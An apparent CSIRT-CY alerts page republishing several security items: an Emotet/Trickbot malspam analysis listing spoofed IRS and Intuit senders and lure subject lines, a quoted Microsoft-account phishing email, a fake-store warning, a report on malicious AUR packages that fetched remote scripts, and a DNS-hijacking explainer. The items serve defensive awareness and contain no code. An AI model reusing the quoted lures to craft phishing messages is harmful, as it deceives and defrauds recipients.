Ειδοποιήσεις

Emotet and Trickbot are information stealers targeting Windows-based computers, and they are best known as banking malware. Each are typically distributed through separate distinct malicious spam (malspam) campaigns. However, we occasionally see both types of malware retrieved during a single infection chain. This Emotet+Trickbot combination doubles the danger for any vulnerable Windows host.

 

As 2018 progresses, Trickbot is still sent through its own malspam campaigns, but we continue to find examples of Trickbot using Emotet as an alternate distribution method. Most writeups about Emotet and Trickbot focus on individual malware characteristics, and they do little to paint a complete picture of a successful infection chain.

This blog post examines Emotet malspam so far in 2018, and we take a closer look at a Emotet infection traffic featuring Trickbot.

 

Similarities

Although Emotet and Trickbot are from different malware families, they have some similarities. Both are information stealers that can load additional modules for functions like spamming or worm-based propagation. And for the last year or so, both have been distributed through malspam using Microsoft Word documents as the initial infection vector.

 

Emotet

Emotet was first reported in the summer of 2014 as banking malware, but has since evolved. By 2017, various sources reported Emotet acting as a loader for other malware like Dridex. One source reported Emotet loading Trickbot, so this most recent combination is not without precedent.

In 2018, Emotet infection traffic usually revealed the IcedID banking Trojan or Zeus Panda Banker as the follow-up malware. In June 2018, I started posting examples of Emotet infection traffic with Trickbot as its follow-up malware. We have also seen spambot malware as the follow-up malware, where the infected Windows host sends out more Emotet malspam.

An Emotet infection currently starts with a malicious macro in a Word document. Macros are disabled by default in Microsoft Office. If a user ignores security warnings and enables macros macros on a vulnerable Windows host, the malicious Word document starts an infection chain. These macro are designed to retrieve Emotet malware from compromised servers to infect a victm’s computer.

Malspam pushing Emotet uses one of the two standard methods to deliver the initial Word document:

  1. Victims retrieve the initial Word document from a link in the email .
  2. The Word document is directly attached to a recipient’s email without any links.

Figure 1: Emotet infection chains so far in 2018.

 

Trickbot

Trickbot first appeared in the fall of 2016 and was initially described as the successor to Dyreza, another credential stealer. Trickbot is a modular malware with additional functions like an email spammer. Its most notable function is lateral movement. By July 2017, Trickbot added an SMB-based worm propagation module, but had not yet included an exploit.

Since June 2018, I have posted examples of Trickbot infection traffic with SMB propagation on malware-traffic-analysis.net, showing Trickbot moving from an infected Windows client to a vulnerable Active Directory (AD) domain controller. Trickbot’s lateral movement over SMB is distinctly different than WannaCry’s implementation of EternalBlue noted in 2017, so this method of SMB propagation appears to be based on a different exploit developed by Trickbot authors.

Trickbot normally has its own malspam-based distribution channel, but now Trickbot attackers are also using Emotet for their infections.

 

Emotet Distribution

On the week starting Monday, June 11th 2018, we saw a great deal of IRS-themed malspam pushing Emotet to recipients in the United States. IRS was not the only theme, but it was by far the most prominent. In the days leading up to July 4th 2018, we also saw Independence Day-themed malspam pushing Emotet to recipients in the United States.

The following are some examples of spoofed senders and subject lines we have seen for recent malspam pushing Emotet since June 11th, 2018.

Spoofed senders:

  • From: [various spoofed sender names and email addresses]
  • From: Internal Revenue Service <[spoofed email address]>
  • From: Internal Revenue Service Online <[spoofed email address]>
  • From: Internal Revenue Service Online Center <[spoofed email address]>
  • From: IRS <[spoofed email address]>
  • From: IRS <irsonline@treasury.gov> <[spoofed email address]>
  • From: IRS <Press@treasury.gov> <[spoofed email address]>
  • From: IRS <Transcript@treasury.gov> <[spoofed email address]>
  • From: IRS Online Center <[spoofed email address]>
  • From: IRS.gov <[spoofed email address]>
  • From: Intuit <[spoofed email address]>
  • From: Intuit Online Payroll Support Team <[spoofed email address]>
  • From: Intuit Payroll <[spoofed email address]>
  • From: Intuit Payroll Services <[spoofed email address]>

Subject lines:

  • Subject: 4th of July congratulation
  • Subject: 4th of July eCard
  • Subject: 4th of July Greeting eCard
  • Subject: Happy 4th of July Greeting Message
  • Subject: Record of Account Transcript from June 14, 2018
  • Subject: Tax Account Transcript from June 14, 2018
  • Subject: The Fourth of July wishes
  • Subject: Verification of Non-filing Letter
  • Subject: Verification of Non-filing Letter from 06/15/2018
  • Subject: Wage and Income Transcript
  • Subject: 0335363294
  • Subject: 2142 Payroll Summary
  • Subject: 3291 Payroll Summary
  • Subject: ACCOUNT#94895547-Milan Marsic
  • Subject: Engr. Abdul Rauf Invoice 8288592
  • Subject: Invoice 897614 from Patrick Bingham
  • Subject: Invoices Overdue
  • Subject: IRS Record of Account Transcript
  • Subject: IRS Record of Account Transcript from 06/14/2018
  • Subject: IRS Record of Account Transcript from 06/15/2018
  • Subject: IRS Record of Account Transcript from June 14, 2018
  • Subject: IRS Record of Account Transcript from June 15, 2018
  • Subject: IRS Tax Return Transcript from 06/12/2018
  • Subject: IRS Tax Return Transcript from June 11, 2018
  • Subject: IRS Tax Account Transcript
  • Subject: IRS Tax Account Transcript from 06/15/2018
  • Subject: IRS Tax Account Transcript from June 15, 2018
  • Subject: IRS Tax Return Transcript
  • Subject: IRS Verification of Non-filing Letter
  • Subject: IRS Verification of Non-filing Letter from 06/11/2018
  • Subject: IRS Verification of Non-filing Letter from 06/12/2018
  • Subject: IRS Verification of Non-filing Letter from June 11, 2018
  • Subject: IRS Verification of Non-filing Letter from June 14, 2018
  • Subject: IRS Wage and Income Transcript
  • Subject: IRS Wage and Income Transcript from 06/14/2018
  • Subject: IRS Wage and Income Transcript from June 11, 2018
  • Subject: IRS Wage and Income Transcript from June 15, 2018
  • Subject: New Invoice / WM2708 / RP# 09648
  • Subject: New Payroll Co.
  • Subject: NYPXV7-16497063849
  • Subject: Pay Invoice
  • Subject: Payment
  • Subject: Payroll Tax Payment
  • Subject: Scott Crowe The 4th of July Greeting eCard

Each of these emails has had either an attached Word document or a link to download the Word document.

Figure 2: Emotet Word document distributed through a link in the malspam.

 

 

Figure 3: Emotet Word document distributed as an attached file.

 

Emotet Levels Jump Drastically Starting in May 2018

Autofocus shows an increasing trend in Emotet malspam during the past year, with a very sharp jump in Emotet Word documents beginning in May 2018. Below are graphs for verified hits on Emotet from links or as attachments. Link hits are the number of times we verified requests for URLs to download an Emotet Word document. Attachment hits are the number of emails seen with an Emotet Word document attached to the message.

 

Emotet Infection in an Active Directory Environment

Malware-traffic-analysis.net blog on June 15th 2018 provides an example of infection traffic from Emotet malspam. This analysis was done in an Active Directory (AD) environment with a domain controller running an unpatched version Windows Server 2008 R2. The Windows client was running an unpatched version of Windows Professional 7 Service Pack 1.

Figure 6: A successful Emotet + Trickbot infection chain in an AD environment.

 

Figure 7: Traffic from the infection filtered in Wireshark.

 

Figure 7 shows the initial infection traffic from Emotet on a Windows client at 192.168.200.95, followed by Trickbot infection traffic on the same host.

Trickbot propagated from the Windows client to the vulnerable domain controller on 192.168.200.4 via SMB. Approximately 20 minutes later, the vulnerable AD domain controller shows signs of a Trickbot infection.

Figure 8 shows traffic where Trickbot was sent to the domain controller at 192.168.200.4.

Figure 8: SMB traffic in Wireshark where Trickbot was sent to the domain controller.

 

Conclusion

This activity combines the increasing amount of mass distribution for Emotet with the lateral movement capabilities of Trickbot. An Emotet+Trickbot combination represents a more potent infection, and it doubles the danger for any vulnerable Windows host.

Organizations with decent spam filtering, proper system administration, and up-to-date Windows hosts have a much lower risk of infection. Palo Alto Networks customers are further protected from this threat. Our threat prevention platform detects both Emotet and Trickbot malware. AutoFocus users can track this activity using the Emotet and Trickbot tags.

We will continue to investigate this activity for applicable indicators to further inform the community and enhance our threat prevention platform.

 

Appendix A

Hits for Emotet Word documents from May 2017 through May 2018:

Month/Year: Links – Attachments – Total

  • May 2017: 8,423 – 1,421 – 9,844
  • Jun 2017: 1,154 – 173 – 1,327
  • Jul 2017: 2,868 – 390 – 3,258
  • Aug 2017: 3,273 – 3,803 – 7,076
  • Sep 2017: 4,650 – 2,211 – 6,861
  • Oct 2017: 9,289 – 3,407 – 12,696
  • Nov 2017: 10,676 – 1,737 – 12,413
  • Dec 2017: 10,499 – 217 – 10,716
  • Jan 2018: 5,287 – 2 – 5,289
  • Feb 2018: 16,637 – 265 – 16,902
  • Mar 2018: 29,801 – 2,680 – 32,481
  • Apr 2018: 6,138 – 3,533 – 9,671
  • May 2018: 13,150 – 289,308 – 302,458

 

Appendix B

Hits for Emotet Word documents in May 2018:

Date: Links – Attachments – Total

  • 2018-05-01: 383 – 0 – 383
  • 2018-05-02: 45 – 437 – 482
  • 2018-05-03: 43 – 150 – 193
  • 2018-05-04: 41 – 604 – 645
  • 2018-05-05: 38 – 0 – 38
  • 2018-05-06: 36 – 0 – 36
  • 2018-05-07: 218 – 711 – 929
  • 2018-05-08: 476 – 9 – 485
  • 2018-05-09: 65 – 1 – 66
  • 2018-05-10: 155 – 957 – 1,112
  • 2018-05-11: 47 – 25 – 72
  • 2018-05-12: 26 – 0 – 26
  • 2018-05-13: 45 – 5 – 50
  • 2018-05-14: 350 – 19 – 369
  • 2018-05-15: 1,274 – 325 – 1,599
  • 2018-05-16: 1,119 – 10,929 – 12,048
  • 2018-05-17: 746 – 19,311 – 20,057
  • 2018-05-18: 386 – 27,437 – 27,823
  • 2018-05-19: 61 – 270 – 331
  • 2018-05-20: 60 – 234 – 294
  • 2018-05-21: 1,632 – 9,098 – 10,730
  • 2018-05-22: 381 – 4,656 – 5,037
  • 2018-05-23: 920 – 7,050 – 7,970
  • 2018-05-24: 536 – 5,169 – 5,705
  • 2018-05-25: 481 – 4,206 – 4,687
  • 2018-05-26: 78 – 134 – 212
  • 2018-05-27: 171 – 743 – 914
  • 2018-05-28: 734 – 13,105 – 13,839
  • 2018-05-29: 1,678 – 35,909 – 37,587
  • 2018-05-30: 566 – 109,409 – 109,975
  • 2018-05-31: 359 – 38,405 – 38,764
  • Totals: 13,150 – 289,308 – 302,458

 

The information contained in this website is for general information purposes only. The information is gathered from Research Center – Paloalto Networks while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

The website “Drop Savings Now” at www.dropsavingsnow.com is another fraudulent website that claims to provide discounts or savings on products. Online users are advised to stay away from the fake online store, or else they run the risk of their personal and credit card information getting stolen and used fraudulently by cybercriminals.

The fraudulent website collects personal and financial information but doesn’t provide a secure connection that is required by all websites that request such sensitive information.

Online users who have used their credit cards on dropsavingsnow.com are asked to contact their banks for help. They should let their banks know that they have unknowingly used their credit cards on a fraudulent website. Their banks should investigate, cancel the transactions and refund their money. They may also need to cancel the same credit cards and get new ones to prevent the scammers from continuously charging them.

 

 

The information contained in this website is for general information purposes only. The information is gathered from Online Threat Alerts while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

The email messages below with the subject: “Account Suspension: violation notice,” which claim that the recipients’ Hotmail, Outlook or Live email accounts will be suspended because they violated Microsoft’s terms and service, are phishing scams sent by cybercriminals to frighten the recipients into clicking on a link within the same email message. The link in the fake email messages goes to a phishing website that will ask the recipients who have clicked on it to sign-in with their usernames and passwords to resolve the issue. But, once the requested information is submitted, it will be sent to the cybercriminals behind the phishing scam.

To protect against phishing scams, online users are asked to never click on a link to sign into their online accounts. They should instead, go directly to their online account provider’s website by typing the website’s address in their web browsers, or use a popular search engine to find their online provider’s website.

 

The “Microsoft Account Violation‏” Phishing Email

From: Microsoft.com Team <kenan_polutan@live.com>

Date: 16 July 2018 at 11:18:09 pm AEST

Subject: Account Suspension: violation notice

VIOLATION OF TERMS OF SERVICE

Your account will be suspended from sending maiIs due to violation of terms of service.

All saved maiIs will be lost if this is not resolved.

Activate And Resolve Issue Now Urgently!

Sincerely,

Customer Care Team ©2018

 

Once cybercriminals have gotten their potential victims’ account credentials (usernames and passwords), they will use it to hijack their Microsoft accounts and use them fraudulently. Therefore, recipients of the phishing email message who were tricked into clicking on the link within it and have attempted to sign into the phishing or fake website that they were taken, are asked to change their Microsoft account passwords immediately, before they are hijacked and used fraudulently by cybercriminals.

Hotmail or Microsoft email account users who have received suspicious email messages can verify the authenticity of email messages, but going directly to www.hotmail.com, www.live.comor www.outlook.com and sign into their accounts from there. If there is something wrong with their accounts, they will be notified once they have signed in.

 

The information contained in this website is for general information purposes only. The information is gathered from Online Threat Alerts while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Yet another incident which showcases that you should not explicitly trust user-controlled software repositories.

One of the most popular Linux distros Arch Linux has pulled as many as three user-maintained software repository AUR packages after it was found hosting malicious code.

Arch Linux is an independently developed, general-purpose GNU/Linux distribution composed predominantly of free and open-source software, and supports community involvement.

Besides official repositories like Arch Build System (ABS), Arch Linux users can also download software packages from several other repositories, including AUR (Arch User Repository), a community-driven repository created and managed by Arch Linux users.

 

Since AUR packages are user-produced content, Arch maintainers always suggest Linux users to carefully check all files, especially PKGBUILD and any .install file for malicious commands.

However, this AUR repository has recently been found hosting malware code in several instances, including a PDF viewer.

 

Compromised PDF Viewer Found on Arch Linux AUR

On June 7, a malicious user nicknamed “xeactor” adopted an orphaned package (software without an active maintainer) called “acroread” which functions as a PDF viewer, and modified it to add malicious code.

As per a Git commit to the package’s source code, xeactor added malicious code that would download a curl script which in turn would install and run a script from a remote server.

This script installs persistent software that meddles with “systemd” and reconfigures it, and would run every 360 seconds.

The investigation revealed that the malicious script was designed to collect data on the infected systems to retrieve the following information:

  • Date and Time
  • Machine’s ID
  • Pacman information (package management utility)
  • The output of the “uname-a” command
  • CPU Information
  • The output of “systemctl list-units” command

The collected data would then be posted in a Pastebin document.

Fortunately, a code analysis discovered the modifications in due time and revealed that the scripts did not appear to be a serious threat, but payloads can be manipulated by the attacker at any time to push sophisticated malicious code.

As soon as this was discovered, maintainers of AUR revert the changes made in the package, suspended xeactor’s account, and also found two more packages that xeactor has recently adopted and modified in the same manner.

 

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Domain Name Server (DNS) hijacking, also named DNS redirection, is a type of DNS attack in which DNS queries are incorrectly resolved in order to unexpectedly redirect users to malicious sites. To perform the attack, perpetrators either install malware on user computers, take over routers, or intercept or hack DNS communication.

DNS hijacking can be used for pharming (in this context, attackers typically display unwanted ads to generate revenue) or for phishing (displaying fake versions of sites users access and stealing data or credentials).

Many Internet Service Providers (ISPs) also use a type of DNS hijacking, to take over a user’s DNS requests, collect statistics and return ads when users access an unknown domain. Some governments use DNS hijacking for censorship, redirecting users to government-authorized sites.

Read more »